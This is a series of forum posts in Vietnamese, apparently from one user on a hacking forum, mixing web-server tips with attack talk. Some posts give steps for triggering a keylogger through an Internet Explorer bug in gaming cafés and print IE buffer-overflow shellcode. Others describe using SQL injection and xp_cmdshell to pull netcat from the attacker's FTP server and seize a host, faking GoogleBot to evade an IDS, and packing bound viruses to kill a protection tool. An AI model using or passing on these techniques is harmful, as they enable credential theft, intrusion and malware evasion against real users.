|
|
Hic bạn đã patch một bản patch cũ hơn phiên bản patch từ lần update trước, nên nó la là phải
|
|
|
Code:
RewriteEngine on
RewriteRule ^Thumucthaythe/([_A-Za-z0-9-]+)/?$ index.php?chuoitruyvan$1
RewriteRule ^categories/([_A-Za-z0-9-]+)/([0-9]+)-([0-9]+)/?$ index.php?action=browse&catname=$1&page=$2&limit=$3 [S=1]
RewriteRule ^categories/([_A-Za-z0-9-]+)/?$ index.php?action=browse&catname=$1
RewriteRule ^search/([_A-Za-z0-9-]+)/([0-9]+)/?$ index.php?action=browse&searchterm=$1&page=$2 [L]
Cái này tôi làm lâu gòi, bạn cứ theo ghi chú mà làm, mod rewrite sẽ ghi đè phần link ảo bằng link thật tức là thay vì bạn dùng link sau
http://hackernohat.googlepages.com/index.php?abc=nohat&hat=no
thì nó sẽ thay thế lại theo ý bạn dạng như sau
http://hackernohat.googlepages.com/abcnohat/hatno
Rất dễ bạn nghiên cứu thử xem
|
|
|
Hèm Modem Planet ADE-3400 có một chức năng tuyệt vời để setup homeserver cực nhanh là DMZ ( vùng phi quân sự theo nghĩa đen ).Bạn vô Misc Configuration -> DMZ gõ IP của máy bạn ( local IP ) và bật Enable chức năng này, từ nay mọi packet từ ngoài tới sẽ đc chuyển hướng tới máy bạn. Còn việc cài HomeServer là chiện giỡn chơi còn lại.
|
|
|
Have been deleted !
|
|
|
Tất cả xảy ra tại hệ thống mạng nhánh, khó từ mạng nhánh control mạng trục, mà mọi data quan trọng nằm ở mạng trục. Vì thế nếu chiếm quyền control mạng nhánh thì thà gửi thẳng một trojan tới mạng này và control nó sau đó tìm cách thăm dò và tấn công mạng trục.
Có vè TCP là ng trong nội bộ mới nắm đc khá kĩ về nội bộ mạng. Hoặc đã lên kế hoạch tấn công nhưng bất thành.
|
|
|
Hèm người ta fake thành GoogleBot, để làm cho IDS bỏ qua, vì GoogleBot hoạt động kỉu một con bot và cái script exploit kia cũng vậy nó cũng hoạt động như 1 bot, vậy nên việc giả GoogleBot là để thế, đằng ấy giả Mozilla FF thì cũng vô ích, vì khi đó cái script là Một normal user, lộ cái một, IDS "diệt".
|
|
|
Hờ cứ tưởng chú em thix bị CIA bụp
|
|
|
Hì thì cứ theo ý đằng ấy
|
|
|
lonely_Xorhandsome wrote:
http://www.google.com/custom?=&cof=:;L:http://www.freewebtown.com/tang05/INTRO/admin.PNG
he chú cứ để cái hình đó và email cho google security team là tui cá là chú em sẽ bị đánh thức lúc nữa đêm bởi CIA : Chú mày đã bị bắt, nếu còn chống cự thì đầu chú này nổ )
|
|
|
Hì hì, cái này cũng có thể gọi là XSS đó gamma95 à, nó lỗi trong việc quản lí biến truyền nên gây ra việc Cross site , dù nó ko có chèn đc script nhưng cũng load đc hình khác , cũng thú vị đấy chứ )
|
|
|
Hèm một bug thú vị của Google , tự tìm hỉu nhé
Code:
http://www.google.com/custom?=&cof=:;L:%68%74%74%70%3A%2F%2F%68%61%63%6B%65%72%6E%6F%68%61%74%2E%67%6F%6F%67%6C%65%70%61%67%65%73%2E%63%6F%6D%2F%6E%6F%68%61%74%2E%67%69%66
|
|
|
Thì đó, mình vướng chỗ này, làm sao tìm ra được site chứa xflash ( chờ anh conmale và mấy anh trên này giúp vì các anh ấy có nhiều kinh nghiệm "bị" tấn công nhưng hic lâu wé!
|
|
|
Mình có chút thắc mắc là kĩ thuật tạo cluster với Linux Virtual Server ko biết có giúp chạy ứng dụng với khả năng chịu tải và chịu lỗi cao hay ko hay chỉ là hệ thống Cluster với kĩ khả năng tính toán đa luồng MultiThread và chỉ dùng để chạy các Application đa luồng ?
|
|
|
conmale wrote:
berserkbot wrote:
Anh ơi, exploit lỗi này như thế nào ạ. Anh có example nhỏ nào exploit ko em học hỏi với
hello berserkbot,
Lỗi này do chính Yahoo công bố và nó thuộc ymmapi nên có lẽ chưa có exploit information đâu.
Chính thông báo trên cho biết lỗi này thuộc phần mail attach dùng activeX và nó thuộc dạng buffer overflow nên việc dò tìm lỗi cũng không quá cực đâu. Còn script hay shellcode cho exploitation này thì anh không có.
Thân.
Chậc bug của ymmapi à bác. Bug này thì lỗi tới tất cả các phiên bản gòi, mà khai thác chắc là khó vì ko biết bug nàm chỗ nào trong dày asm của nó, trong khi yahoo có điên mới tạo Information Exploit cho nó :wink:
|
|
|
Ối giời ơi, cám ơn rất nhiều rất nhhiều, thứ này quý lắm, tra nó là hết xẩy cho dù ai khá english gòi thì thứ này cũng quả là món thú vị )
Rất cám ơn
Ủa mà seo nó là Oxford Dictionary 1994 mừ đâu phải 2006
|
|
|
ducminhquan wrote:
Thiệt tình, có bug gồi mà ko bít khai thác nữa
Cách khai thác đon giản nhất:
1) Tạo 1 keylogger, đặt tên là calc.exe, chép vào thư mục Windows\System32
2) Up cái file HTML trên lên host riêng của bạn (dùng host free cũng dc)
3) Vào IE, đặt địa chỉ file HTML trên host của bạn làm Homepage
2,3*) Cũng có thể đặt đại trong máy rùi copy đường dẫn vào phần homepage là được
=> Mỗi lần vào IE thì keyloger sẽ dc kích hoạt
Bạn nào pro hơn 1 chút có thể dùng cách này:
1,2) Tương tự trên
3) Các bạn để ý khi chạy game online, thì trang tin tức sẽ mở lên trong cửa sổ patcher (thực chất nó dùng IE để mở). Để khai thác, các bạn sửa chữa lại đường dẫn tới trang tin tức đó thành link đến file HTML trên host của bạn. (cách đổi thế nào thì các bạn phải tự tìm hiểu)
=> Mỗi lần mở game online thì keyloger sẽ được bật
Hiện nay mấy tiệm Game thường có sẵn chung trình antikeylogger, khi khách vào chơi khách sẽ dùng anti này để tắt hết các keylogger đang chay từ trước, vì thế dùng cách chạy keylogger khi statup sẽ ko khả thi, Vì thế có thể dùng cách trên để keylog.
P/S: Hem biết bài viết có vi phạm nội quy hok nữa, nếu vi phạm thì cho em xin lỗi và xóa dùm em bài này>
)
Nếu chỉ để chạy một keylogger được đặt sẵn trên máy nạn nhân thì chắc chả hacker nào ngồi mổ xẻ IE ra để tìm bug đâu )
|
|
|
Code:
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
Đây là ShellCode sẽ chèn vào khi IE bị bufferoverflow ,bộ đệm của IE bị tràn dẫn đến có thể chèn một mã máy vào đó để bắt IE thực hiện. Đây là dạng tấn công Remote BufferOverFlow, giúp có thể chiếm quyền kiểm soát hệ thống máy tính bị dính bug. Khai thác lỗi này ,kẻ thâm nhập cần có kiếm thức vững về cấu trúc x86 cũng như cách tổ chức của bộ nhớ mới có thể khai thác hiệu quả, còn các script kiddes chắc chắn chả làm được gì nhiều, nên đừng ngó làm gì.
|
|
|
Chả có cái query nào sinh link admin cả nó chỉ có xp..shell để chạy command thui (nếu có sa ) thì cứ cho nó connect tới một FTP server của mình downcon netcat về , khởi động netcat, connect vô rùi dir là ra cái dir chứa nó, mò típ một tẹo là ra link admin , mà đã tới bước này thì chả cần link admin làm giề vì có quyền trên hệ thống òi, set user nữa là xong, chiếm toàn quyền hệ thống
|
|
|
Hèm theo nohat thì cứ bỏ tất vô một layer ( thẻ DIV đó ) rùi cho thẻ này full 100% kệ xác cái kích thước màn hình, cái này chơi lun mấy cái freehost có ads )
|
|
|
Hèm một số site khá khôn, họ gỡ lun file admin , nếu trang này dính SQL injection Bug thì cứ query vô chạy command,up con netcat lên rùi tha hồ quậy cần gì link admin
|
|
|
Bạn phải đi kí hợp đồng với 1 nhà cung cấp dịch vụ mobile nào đó, vì chỉ họ mới có SMS gate thôi, đừng mong có gate miễn phí, hết òi, giờ ko còn cái gate nào miễn phí đâu.Nhưng nói trước kí hợp đồng với họ mắc ráng chịu à nha, cao lắm đó.
|
|
|
Hê hình như PCWorld có bài viết về vụ này òi, lục mấy số báo gần đây đê
|
|
|
Ặc Windows ko phải là mã nguồn mở (OpenSource) mà nó là mã nguồn đóng (CloseSource) ch o dù trước đây code của windows NT có bị lộ một vài đoạn, nhưng nó chỉ là layer lớp trên thui, không phải là code kernel vì code này chỉ có lão Bill nhà ta nắm, lão mà lộ ra là coi như mất cơ nghiệp.
Code này em có thể tìm trong CD số 4 của Fedora hay trong thư mục source của Fedora, hay dễ hơn là đi tìm source của OpenDOS.
Việc đọc ghi dữ liệu lên harddisk chủ yếu là phần trách nhiệm của các ngắt của BIOS.Khi OS đã có quyền Operating hệ thống thì nó sẽ chạy các instruction điều hướng các ngắt của BIOS để điều khiển đọc ghi thui, em lôi một cuốn Assembly nào đó ra là có à.
|
|
|
Mới nghe là có vụ nuôi virus đó .Chú em nên đi học cho ra hồn đi đã, chưa gì lo đi sưu tầm virus để chơi, tính mang khoe à ?
|
|
|
He tui nghĩ đây là vụ giả gái lừa A-E nữa 10a3 hic trong già khú khụ ( con nít mà già gớm ) thứ 2 con nít mà là con gái thì ko nên vào đây "em" à.
Giao thức Mail thì cần ngâm dấm các thứ sau
SMTP
POP3
Mã hoá mine cho attach file
Tài liệu RFC có đủ
ghé vô www.w3c.org là có.
|
|
|
Bác Autum ,Còn phần 2 hả tưởng hết rùi ?
|
|
|
Tui cũng nghi ngờ nên test thử rùi,nếu pack thêm phát nữa cũng bị đập thui.Chỉnh cả PE header làm giả PE của msconfig cũng bị túm ( đôi lúc chỉnh PE AutoIT cũng ko chịu chạy )
|
|
|
Thứ 2 ,em đã thử suy nghĩ và tìm ra một cách mà autoitscript chơi gọn program của bác là cũng ý tưởng tạo 2 process.Em bind 2 tệp virus với 2 phiên bản có kĩ thuật lây lan khác nhau sau đó khi kích hoạt tệp này nó sẽ extract 2 con vào temp folder hay internet cache ,xong run tự động cả 2 file ( em thử với phiên bản đâu tiên của bác ,nó chơi program của bác toi chết lẹ !),vì em thấy một khuyết điểm là khi bind 2 con virus vào một file exe đc nén bằng thuật ASPack thì IEprotector ko thể detect đc khi chạy bind file,nó extract và chạy file thứ 1 IEprotector diệt ngay file 1 nhưng file 2 còn kịp chạy và end xong process của bác.Xong em tự nhiên cho con autoit này extract từ trong mã ra 3 phiên bản khác ( ko có tính năng lây lan chỉ có tính năng protect process ) và nó đc protect bởi 3 process + với process chính.Hết diệt .....!
Em mong bác có ý kiến để sửa kịp thời program.
|
|
|
Em đề nghị bác nhân rộng tầm phủ sóng của program này bằng cách đặt nó lên càng nhiều nơi cho down càng tốt ,càng rộng thì nó sẽ đến đc tay của hầu hết ngưởi dùng internet ở Việt Nam ,bác nên làm cho giao diện đơn giản hơn tới mức ,người có chỉ số IQ <0 cũng hiểu đc vì dân chatter VN đa phần (đa phần chứ ko phải tất cả) cực kì .......! .Em nghĩ nên thông báo sự có mặt của nó rộng hơn cho các bản tin điện tử chẳng hạn,em ngán mỗi ngày vào Offline msg là có cả núi tin nhắn vô nghĩa mà đọc vô là biết ngay của một con virus cực ngu nào đó.
|
|
|
Hey sau khi ngồi ngâm chán chê cái đoạn PE của autoit nói thật em chả tìn thấy cái sign nào cho cam để diệt AutoIt Script cả ,mong bác cho xin ý kiến về cái sign mà bác đã dùng để nhận diện các script autoit.
Em xin có chút ý kiến
Là bác đã tính tới vụ script AutoIt nó tắt process của bác chưa ? thứ 2 là bác chỉ có thể end từng process 1 trong 1 thời gian rất ngắn nhưng nếu tên tạo AutoItscript đó tạo ra 2 process để protect cho nhau và kết hợp với việc end cái process của bác thì .... thật khó lường .
Đó là chút ý kiến của em,bác xem qua rồi cho em biết nhé.
@Conmale: Em lạy bác đừng có châm em nhá -))
|
|